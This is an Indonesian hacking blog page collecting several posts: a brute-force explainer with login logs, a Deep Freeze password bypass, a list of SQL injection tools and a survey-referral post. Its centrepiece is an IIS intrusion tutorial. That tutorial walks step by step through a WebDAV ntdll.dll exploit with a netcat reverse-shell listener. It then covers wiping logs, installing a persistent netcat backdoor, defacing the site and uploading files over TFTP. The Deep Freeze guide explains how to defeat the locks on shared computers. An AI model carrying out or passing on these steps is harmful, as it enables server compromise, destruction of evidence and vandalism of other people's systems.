♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Brute force share



Apa dan Bagaimana cara mengatasi Brute force?
February 6th, 2010

Pada kesempatan kali ini saya akan berbagi pengetahuan mengenai Brute Force yang sering terjadi pada server-server atau aplikasi lainnya yang pernah saya temui.

Pada dasarnya Serangan brute-force adalah sebuah cara penyerangan terhadap sistem keamanan komputer/Server yang menggunakan percobaan terhadap berbagai macam cara yang mungkin bisa terjadi. Dengan kata lain Serangan brute force adalah cara Coba-coba untuk memasuki komputer/server Orang laen. Salah satu cara yang bisa dilakukan adalah dengan program password cracker.

Password cracker adalah program yang mencoba membuka sebuah password yang telah terenkripsi dengan menggunakan sebuah algoritma tertentu dengan cara mencoba semua kemungkinan yang ada.

Adapun contoh Log nya sebagai berikut, kalau ada yang mencoba melakukan brute force:

Failed Logins UserIPAuthentication Service ▾Login Time fbolivar
114.80.124.108system2010-02-06 17:28:12
cobranzas114.80.124.108system2010-02-06
17:28:11 aravello114.80.124.108system2010-02-06 17:28:08 aravello
114.80.124.108system2010-02-06 17:28:11 compras114.80.124.108system2010-02-06
17:28:07 fbolivar114.80.124.108system2010-02-06 17:28:15 gerenciatecnica
114.80.124.108system2010-02-06 17:28:07
icardenas114.80.124.108system2010-02-06
17:28:23 compras114.80.124.108system2010-02-06 17:28:03 gtello
114.80.124.108system2010-02-06 17:28:23 dflores114.80.124.108system2010-02-06
17:28:03 barbara114.80.124.108system2010-02-06 17:28:00 amanda
114.80.124.108system2010-02-06 17:28:03
cobranzas114.80.124.108system2010-02-06
17:27:56 contacto114.80.124.108system2010-02-06 17:27:56 flores
114.80.124.108system2010-02-06 17:28:00 amanda114.80.124.108system2010-02-06
17:27:59 compras114.80.124.108system2010-02-06 17:28:23 barbara
114.80.124.108system2010-02-06 17:27:55
cobranzas114.80.124.108system2010-02-06
17:27:51 gerenciatecnica114.80.124.108system2010-02-06 17:27:48 sandra
114.80.124.108system2010-02-06 17:27:51 barbara114.80.124.108system2010-02-06
17:28:15 ecaqui114.80.124.108system2010-02-06 17:28:15 patricia
114.80.124.108system2010-02-06 17:27:44 dflores114.80.124.108system2010-02-06
17:27:44 contacto114.80.124.108system2010-02-06 17:27:36 linda
114.80.124.108system2010-02-06 17:27:32 flores114.80.124.108system2010-02-06
17:27:44 flores114.80.124.108system2010-02-06 17:27:39

Brutes (Excessive Login Failures) IPNotesBeginExpiration
59.173.21.94failed login attempts to account hanspete (system) –
Large number of
attempts from this IP: 59.173.21.942010-01-31 19:25:002010-02-14 19:25:00
121.14.224.73 failed login attempts to account mysql (system) — Large
number of attempts from this IP: 121.14.224.732010-02-01 12:14:212010-02-15
12:14:21 110.75.164.1 failed login attempts to account ada (system) –
Large number of attempts from this IP: 110.75.164.12010-02-01
19:48:212010-02-15
19:48:21 200.35.151.101 failed login attempts to account allan (system) –
Large number of attempts from this IP: 200.35.151.1012010-02-03
04:19:452010-02-17
04:19:45 210.21.221.158 failed login attempts to account test (system) –
Large number of attempts from this IP: 210.21.221.1582010-02-03
21:31:262010-02-17
21:31:26 110.9.194.37 failed login attempts to account sales (system) –
Large number of attempts from this IP: 110.9.194.372010-02-05
02:58:302010-02-19
02:58:30 112.216.3.83 failed login attempts to account test (system) –
Large number of attempts from this IP: 112.216.3.832010-02-05
09:28:152010-02-19
09:28:15 219.95.128.58 failed login attempts to account root (system) –
Large number of attempts from this IP: 219.95.128.582010-02-05
15:21:422010-02-19
15:21:42 210.51.52.132 failed login attempts to account root (system) –
Large number of attempts from this IP: 210.51.52.1322010-02-05
17:21:382010-02-19
17:21:38 114.80.124.108 failed login attempts to account fiscal (system)
– Large number of attempts from this IP: 114.80.124.1082010-02-06
17:30:422010-02-20
17:30:42 76.73.56.227 failed login attempts to account gopher (system) –
Large number of attempts from this IP: 76.73.56.2272010-02-05
22:37:032010-02-19
22:37:03

Adapun Tips Cara menghindarinya antara Lain:

1. Bisa melakukan Filter Firewall pada Server, Blok akses IP di server.

2. Bisa dengan membuat User dan Pass unik yang sulit untuk ditebak namun mudah kita ingat pada aplikasi web/server.

Trik Cara membuat Pass yang unik:

A. Gabungan kombinasi dari angka, huruf besar/kecil dan karakter yang ada.

B. Buat karakter Pass sepanjang mungkin, minimal 12

C. Jangan sampai menggunakan kata yang bisa ditemui di Kamus-kamus.
READMORE
 

Cara Membobol Deepfreeze Warnet


Deep Freeze adalah salah satu program "pengaman" yang paling populer di warnet. Program ini memang cukup powerfull dalam menghadapi virus maupun tingkah laku usil pengunjung warnet. Apapun perubahan yang dilakukan oleh virus maupun pengunjung akan dikembalikan seperti kondisi semula oleh DF.

Sayangnya karena terlena oleh kemudahan ini, beberapa admin warnet kadang jadi lupa dengan password DF, akibatnya admin kebingungan ketika hendak menginstall program baru karena program tersebut akan ditendang lagi oleh Deep Freeze.

Berikut ini salah satu cara untuk mereset / membobol password DeepFreeze yang sudah dicoba dengan DF 5 dan DF 6.

Berikut ini salah satu cara untuk mereset password DeepFreeze yang sudah saya coba dengan DF 5 dan DF 6.

Untuk DF 5 :

1. Install Df di kompie lain yang tidak terproteksi dengan DF. Set passwordnya sesuka anda. Agar saat ini rekan-rekan dengan saya, kita anggap saja password barunya adalah "bakmi"(tanpa tanda kutip).

2.Untuk DF 5, password DF tersebut disimpan di file bernama Persi0.sys yang terletak di drive C

Cara mereset passwordnya logikanya lumayan gampang seh : Kita replace saja file persi0.sys lama yang passwordnya kita lupa dengan file persi0.sys baru yang tentu saja passwordnya kita tahu karena baru saja kita buat.

3. hanya saja sampe saat ini proses mereplace ini setahu saya ternyata nggak gampang-gampang amat karena belum ada yang bisa melakukan dalam normal windows. (Bagi rekan-rekan yang tahu caranya silakan memberi masukan ). File persi0.sys tidak mau ditindih dengan file persi0.sys baru dalam normal wondows karena terproteksi oleh DF yang sedang berjalan.

4. Karena file persi0.sys tidak bisa diganggu gugat dalam normal windows maka kita terpaksa mencari cara lain. Anda bisa mencoba memakai sistem operasi lain, sistem operasi portabel, dan sebagainya untuk mereplace file persi0.sys. Tetapi saya pribadi cukup puas dengan memakai Recovery Consol milik Windows XP Prof Edition.

5. Anggap saja kita memakai CD Windows XP Professional untuk masuk DOS versi XP(Recovery Console Windows XP). Restart komputer. Set BIOS untuk boot lewat CD. Tekan enter untuk masuk CD Windows. Tunggu sampai muncul tulisan Windows XP Professional Setup. Muncul 3 pilihan : To Setup Windows XP Now, press Enter ; To repair a Windows XP installation using Recovery Console, press R ; To quit setup without installing Windows XP, press F3. Pilih/tekan R (to repair) untuk masuk ke dalam Recovery Console.

6. Isikan password admin anda. Bila dulu saat anda menginstall, tidak memasang password, tinggal tekan enter. Muncul prompt : C:Windows>

7.Copi file Persi0.sys dengan nama lain. Karena file Persi0.sys menyimpan password Bakmi, maka pada contoh ini file persi0.sys saya copi menjadi Bakmi.sys.

C:Windows> cd c: ---- pindah direktori ke C:

C:>copy persi0.sys Bakmi.sys ---- copi persi0.sys dengan nama lain

C:>exit ---- keluar

8. Masuk windows normal, copikan file Bakmi.sys di komputer teman anda tersebut ke dalam CD atau USB.

9. Selanjutnya masuk komputer anda yang DeepFreeze-nya terpassword. Copikan file bakmi.sys yang sudah anda buat ke dalam drive yang tidak diproteksi oleh DeepFreeze. Bila drive C diproteksi oleh DeepFreeze maka jangan masukkan bakmi.sys ke drive C, karena file ini akan dihapus oleh DeepFreeze. Anggap saja kita kopikan bakmi.sys ke drive D. Windows Recovery Console seperti cara sebelumnya. Rename file persi0.sys dengan nama lain. Copikan file bakmi.sys di drive D menjadi persi0.sys di drive C.

C:Windows>cd c: ----- pindah direktori

C:>ren persi0.sys Cp_persi0.sys ----- rename persi0.sys dengan nama lain

C:>copy d:Bakmi.sys cersi0.sys ----- copy file baru menjadi persi0.sys

C:>exit

10. Masuk Windows, Masuk program DeepFreeze(konfigurasi) : Tekan Ctrl+Shift pada keyboard sambil mengklik icon DeepFreeze di Taskbar. Muncul kotak password. Isikan dengan password yang baru saja anda buat yaitu : Bakmi. Anda sudah bisa masuk file konfigurasi, tanpa perlu menginstall ulang DeepFreeze.Tanpa perlu install ulang windows.

Catatan :

Bila anda melakukan cara yang lebih ekstrim, seperti menghapus/merename file persi0.sys tanpa menggantikannya dengan file lain maka ada resiko system menjadi tidak stabil atau icon DeepFreeze-nya malah hilang dari Taskbar.

Ide-ide di atas bisa anda coba, bila DeepFreeze anda mengalami kerusakan sehingga meskipun anda ingat passwordnya tetapi program DeepFreeze itu sendiri hilang lenyap tidak tampak di Taskbar dan tidak bisa dipanggil. Kemungkinan besar ada file yang corrupt, bisa jadi file tersebut adalah file persi0.sys. Coba lakukan cara yang sama.

Untuk Deep Freeze versi 6 :

Caranya persis sama dengan Deep Freeze versi 5. Hanya saja untuk versi tertentu namanya lain yaitu $persi0.sys. Jadi kalau untuk DF versi 5 yang harus anda replace adalah file persi0.sys untuk DF versi 6 file yang harus anda replace adalah $persi0.sys (ada tambahan tanda dollar di depan).

Lha cara mereplacenya tentunya suka-suka anda, mau pake Linux, mau pake DOS, pake sistem oparasi portabel ya terserah situlah. Pada contoh ini saya cukup memanfaatkan Recovery Consolnya XP saja, karena nggak merasa butuh program lain.
atau yg lebih mudah lg nih pke software aja

http://www.ziddu.com/download/876340...ze1.0.rar.html
READMORE
 

Terbaik SQL Injection Scanners

Sementara adopsi aplikasi web untuk menjalankan bisnis online telah memungkinkan perusahaan untuk menghubungkan mulus dengan pelanggan mereka, itu juga terkena sejumlah masalah keamanan yang berasal dari kode yang tidak benar. Kerentanan dalam aplikasi web yang memungkinkan hacker untuk memperoleh akses langsung dan publik terhadap informasi sensitif (misalnya data pribadi, rahasia login).

Aplikasi Web memungkinkan pengunjung untuk mengirimkan dan mengambil data ke / dari database melalui Internet. Database adalah jantung dari aplikasi web yang paling. Mereka menyimpan data yang dibutuhkan untuk aplikasi web untuk menyampaikan konten khusus bagi pengunjung dan memberikan informasi kepada pelanggan, pemasok dan lain-lain

SQL Injection mungkin adalah aplikasi web-teknik hacking yang paling umum yang mencoba untuk melewati perintah SQL melalui aplikasi web untuk dieksekusi oleh database back-end. kerentanan tersebut disajikan ketika masukan pengguna tidak benar dibersihkan dan dengan demikian dijalankan.

Memeriksa kerentanan SQL Injection melibatkan audit aplikasi web Anda dan cara terbaik untuk melakukannya adalah dengan menggunakan SQL Injection Scanner otomatis. Kami telah menyusun daftar gratis SQL Injection Scanners kami percaya akan menjadi nilai untuk kedua pengembang aplikasi web dan profesional auditor keamanan.

SQLIer - SQLIer mengambil URL yang rentan dan upaya untuk menentukan semua informasi yang diperlukan untuk mengeksploitasi kelemahan SQL Injection dengan sendirinya, tidak memerlukan interaksi pengguna sama sekali. Dapatkan SQLIer.


http://bcable.net/project.php?sqlier


SQLbftools - SQLbftools adalah kumpulan alat untuk mengambil informasi MySQL tersedia menggunakan serangan SQL Injection buta. Dapatkan SQLbftools.


http://www.reversing.org/node/view/11


SQL Injection Brute-pompa kecil - SQLibf adalah alat untuk automatizing pekerjaan mendeteksi dan memanfaatkan kerentanan SQL Injection. SQLibf dapat bekerja dalam terlihat dan Blind SQL Injection. Ia bekerja dengan melakukan operasi logika SQL sederhana untuk menentukan tingkat eksposur dari aplikasi rentan. Dapatkan SQLLibf.

http://www.open-labs.org/sqlibf19beta1.tar.gz


SQLBrute - SQLBrute adalah alat untuk memaksa data kasar dari database menggunakan SQL injection kerentanan buta. Mendukung berbasis waktu dan memanfaatkan kesalahan berdasarkan jenis pada Microsoft SQL Server, dan mengeksploitasi kesalahan berdasarkan pada Oracle. Hal ini ditulis dengan Python, menggunakan multi-threading, dan tidak memerlukan perpustakaan non-standar. Dapatkan SQLBrute.


http://www.justinclarke.com/security/sqlbrute.py


Bobcat - Bobcat adalah alat untuk membantu auditor dalam mengambil keuntungan penuh dari kerentanan injeksi SQL. Hal ini didasarkan pada penelitian AppSecInc. Hal ini dapat daftar severs terkait, skema database, dan memungkinkan pengambilan data dari tabel bahwa aplikasi pengguna saat ini memiliki akses ke. Dapatkan Bobcat.


http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html


SqlMap - SqlMap adalah buta otomatis alat injeksi SQL, yang dikembangkan di python, mampu untuk melakukan manajemen database sidik jari sistem aktif, enumerasi seluruh remote database dan banyak lagi. Tujuan SqlMap adalah untuk menerapkan manajemen database alat yang berfungsi penuh sistem yang mengambil keuntungan dari kelemahan keamanan pemrograman aplikasi web yang mengarah ke SQL kerentanan injeksi. Dapatkan SqlMap.


http://sqlmap.sourceforge.net/


Absinthe - absinthe adalah tool berbasis GUI yang mengotomatiskan proses download skema dan isi database yang rentan terhadap Blind SQL Injection. Dapatkan absinthe.


http://www.0x90.org/releases/absinthe/download.php


SQL Injection Pen-testing Alat - Alat SQL Injection adalah utilitas GUI berbasis dirancang untuk memeriksa database melalui kerentanan dalam aplikasi web. Dapatkan SQL Injection Pen-testing alat.


http://sqltool.itdefence.ru/indexeng.html


SQID - SQL Injection penggali (SQLID) adalah baris perintah program yang mencari suntikan SQL dan kesalahan umum di website. Hal ini dapat melakukan operasi follwing: mencari injeksi SQL di sebuah halaman web dan menguji mengirimkan formulir untuk kerentanan SQL injection mungkin. Dapatkan SQID.


http://sqid.rubyforge.org/


Blind SQL Injection Perl Tool - bsqlbf adalah script Perl yang memungkinkan auditor mengambil informasi dari situs web yang rentan terhadap SQL Injection. Dapatkan Alat Blind SQL Injection Perl.


http://www.unsec.net/download/bsqlbf.pl


SQL Injection Power Injector - SQL Power Injection membantu tester penetrasi untuk menyuntik perintah SQL di halaman web. Ini kekuatan utama adalah kemampuannya untuk mengotomatisasi injeksi SQL membosankan buta dengan beberapa thread. Dapatkan Power Injection SQL.


http://www.sqlpowerinjector.com/


FJ-Injector Framwork - FG-Injector adalah kerangka kerja open source bebas dirancang untuk membantu menemukan kerentanan injeksi SQL pada aplikasi web. Ini termasuk fitur proxy untuk menahan dan memodifikasi permintaan HTTP, dan sebuah antarmuka untuk mengotomatisasi eksploitasi injeksi SQL. Dapatkan FJ-Injector Framework.


http://sourceforge.net/project/showfiles.php?group_id=183841


SQLNinja - SQLNinja adalah alat untuk mengeksploitasi kelemahan SQL Injection pada aplikasi web yang menggunakan Microsoft SQL Server sebagai database back-end nya. Dapatkan SQLNinja.


http://sqlninja.sourceforge.net/


Automagic SQL Injector - The Automagic SQL Injector adalah alat injeksi SQL otomatis yang dirancang untuk membantu menghemat waktu pada pengujian penetrasi. Hal ini hanya dirancang untuk bekerja dengan vanili lubang injeksi SQL Microsoft di mana kesalahan dikembalikan. Dapatkan Injector SQL Automagic.


http://www.indianz.ch/tools/attack/automagic.zip


NGSS SQL Injector - NGSS SQL Injector mengeksploitasi kerentanan dalam injeksi SQL pada database server yang berbeda untuk mendapatkan akses ke data yang tersimpan. Saat ini mendukung database sebagai berikut: Akses, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Dapatkan Injector SQL NGSS.


http://www.indianz.ch/tools/attack/sqlinjector.zip
READMORE
 

Hacking Dengan IIS

1) Pendahuluan

Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!

2) Adanya Celah Keamanan

Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.

Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.

Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa

Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.

Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.

Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J

3) Mengeksploitasi celah keamanan dan Mengendalikan webserver

Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:

D:\nc>nc -Lvp 6666

Listening on [any] 6666 ….

Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.

D:\vcproject\webdave\debug>web.exe

[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]

www.coromputer.net && undernet #coromputer

syntax: D:\WEB.EXE [padding]

Cool !!! Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:

D:\vcproject\webdave\debug>web.exe 123.123.123.123 200.200.200.200 6666

Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.

D:\nc>nc -Lvp 6666

Listening on [any] 6666 ….

connect to 200.200.200.200 from 123.123.123.123

Microsoft(R) Windows 2000

(C)Copyright Microsoft Corp 1981-2000.

C:\winnt\system32>

Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.

4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?

Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.

C:\winnt\system32> rmdir /s /q logfiles

Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.

Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.

Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.

Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:

C:\inetpub\wwwroot> copy index.html indexold.html

C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html

Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:

C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html

Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:

C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100

Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.

5) Kesimpulan

Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.

Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.
READMORE
 

Mendapatkan Free Dollar Dengan Survey

Hai rekan-rekan saya ingin berbagi informasi nih.. :)
Gini kebetulan saya suka googleng ehh.. Tiba-tiba saya buka ada informasi mendapatkan dollar gratisssss!!!
OK langsung aja yah..
Mungkin untuk anda yang suka maen GAME ONLINE atau untuk apa saja,tidak perlu bayar karna dalam tutorial ini semua gratis…
LANGKAH – LANGKAH :
1. Silahkan buka link ini/copy paste pada browser anda http://awsurveys.com/HomeMain.cfm?RefID=ch0m3l
Kemudian pada halaman tersebut Klick “Create A Free Account”
2. Lakukan surveys Kecil untuk mendapatkan $6
” The positives of joining A.W. Surveys. If you are certain you can be diligent instaying an active member with them, I would recommend taking advantage of the free to sign up opportunity. A.W. Surveys has paid out over $100,000 to their active members since they’ve been in existence. A.W. Surveys offers you a minimum of a $6.00 sign up bonus survey for signing up with them. In addition to this they’ve added $20.00 more in $4.00 sign up bonus surveys and a $1.00 monthly bonus survey. This technically gives you a $27.00 sign up bonus. On top of that you can make $1.25 for every member you refer worldwide. Remember, the only downfall isthat A.W.Surveyswill delete your account if you are inactive for more than 45 days.
Please go to the Refer Friends tab and you will be provided with a link to give to your friends. Once they visit this link and sign up for a Free account you will be credited for the referral. You may also use our Banner images with link code to post on a website.”
3. Langkah Berikut buatlah account Premier di http://www.PayPal.com.
(Jika PayPal menanyakan Bank atau Kartu kredit anda, cancel aja dan lanjutkan karna itu tetap 100% Gratiss)
4. Jika uang anda sudah mencapai minimum maka anda dapat mentransfer uang anda dari A.W Surveys ke dalam account PayPal anda.
Catatan :
Jangan Lupa untuk tetap login setiap 45 hari untuk memastikan account anda aktif.
Untuk Lebih Jelas silahkan baca Term Of Services (T.O.S)
Selamat Mencoba Semoga Bermanfaat.
READMORE
 

Indonesia Hacker

Indonesia Hacker atau Hacker Indonesia atau Indonesian Hacker, di bolak balik ajah sih sebenernya. Haha.. Kini bendera Indonesia mulai berkibar di dunia internet karena komunitas hacker indonesia yang sangat kompak, atraktif, maju, innovatif dan terbuka. Oleh karena itu mari kita teruskan perjuangan para under / up ground Indonesia Hacker. Demi kemajuan dunia teknologi informatika saat ini mari seluruh Indonesia Hacker atau Hacker Indonesia atau Indonesian Hacker pada umumnya dan BinusHacker khususnya mendukung perkembangan teknologi dan opensource.
Berikut ini ulasan yang sedikit gw dapet tentang sejarah hack this stuff dari bang kiwil dengan sedikit banyak gw revisi dolo demi perkembangan Indonesia Hacker. Hehe..
Sejarah tentang Hack, Hacker, dan Hacking
Sebelum terbentuknya komunikasi yang tercipta di Internet, pada tahun 1960-an beberapa mahasiswa ilmu komputer di Massachusetts Institute of Technology (MIT) yang gemar untuk melakukan engineering dan re-engineering terhadap perangkat keras dan perangkat lunak sering melakukan diskusi-diskusi terbuka yang disana membahas masalah :
  • Ide-ide mengenai pengembangan perangkat keras dan perangkat lunak
  • Ide-ide mengenai transformasi terhadap teknologi dan informasi
Pengistilahan dan perkataan “Hack” sebenarnya adalah merupakan slang yang pada saat itu belum memiliki arti yang spesifik dan sebenarnya. Kebiasaan-kebiasaan mengucapkan “I Hack This Stuff” seakan-akan memberikan arti bahwa istilah Hack merupakan kegiatan yang sedang dan memperoleh hasil setelah melakukan pengembangan terhadap segala sesuatu yang dilakukan. Pengembangan-pengembangan yang secara khusus diberikan kepada minicomputer dan microcomputer tersebutlah istilah “Computer Hacker” terbentuk.
Dengan kata lain, Computer Hacker adalah seseorang yang mengaplikasikan kemampuan dalam cakupannya mengenai komputer software, komputer hardware, komputer arsitektur, komputer desain, serta administrasi yang terkandung didalamnya. Seorang Hacker dituntut memiliki kemampuan dalam hal pemrograman untuk tingkatan software, dan keahlian dibidang hardware. Tuntutan yang sedemikian luasnya untuk keamanan disisi sistem aplikasi dan jaringan, memberikan motivasi bagi seorang Hacker untuk mengembangkan keahlian tersebut sehingga hasil dari penelitian yang dilakukan akan memberikan dampak yang positif bagi kelangsungan IT itu sendiri.
Dengan melihat sekelumit penjelasan diatas, kita dapat memberikan kesimpulan bahwa Hacking bukanlah sebatas pada kegiatan illegal yang identik dengan pengrusakan sebuah sistem dan aplikasi, atau sebatas kegiatan-kegiatan tentang pencurian sebuah data-data penting, melainkan kepada tindakan untuk melakukan perubahan yang mendasar atau perbaikan-perbaikan terhadap sistem dan aplikasi, baik yang berupa software ataupun hardware.
KELOMPOK HACKER BERDASARKAN MOTIF
  • Black Hat Para hacker yang menjelma menjadi cracker / attacker yang menggunakan kemampuannya untuk tujuan kriminal dan cenderung membahayakan kepentingan pihak lain. Pada umumnya orang-orang yang tergabung dalam kelompok ini adalah yang bergerak secara individu atau sesuai idealisme tertentu dan tidak terikat atas kepentingan pihak tertentu.
  • Grey Hat Para hacker yang memberikan informasi yang diperoleh ke para attacker maupun para vendor, untuk memperoleh imbalan tertentu. Kelompok ini dikenal juga sebagai cracker, yakni orang-orang yang tidak memiliki keberpihakan pada pihak manapun dan menjual berbagai informasi yang diperlukan sesuai kebutuhan yang ada.
  • White Hat (hacker sejati) Orang-orang yang melakukan aktivitas hacking dalam rangka memperoleh informasi tentang celah-celah keamanan, maupun kelemahan-kelemahan yang dimiliki untuk diberikan kembali kepada pihak yang bersangkutan untuk disempurnakan kembali.
  • Blue Hat yang punya kemampuan seperti white hat, tapi berkecimpung di dunia pendidikan.
TUJUH KELOMPOK HACKER BERDASARKAN PROFILE KEMAMPUAN
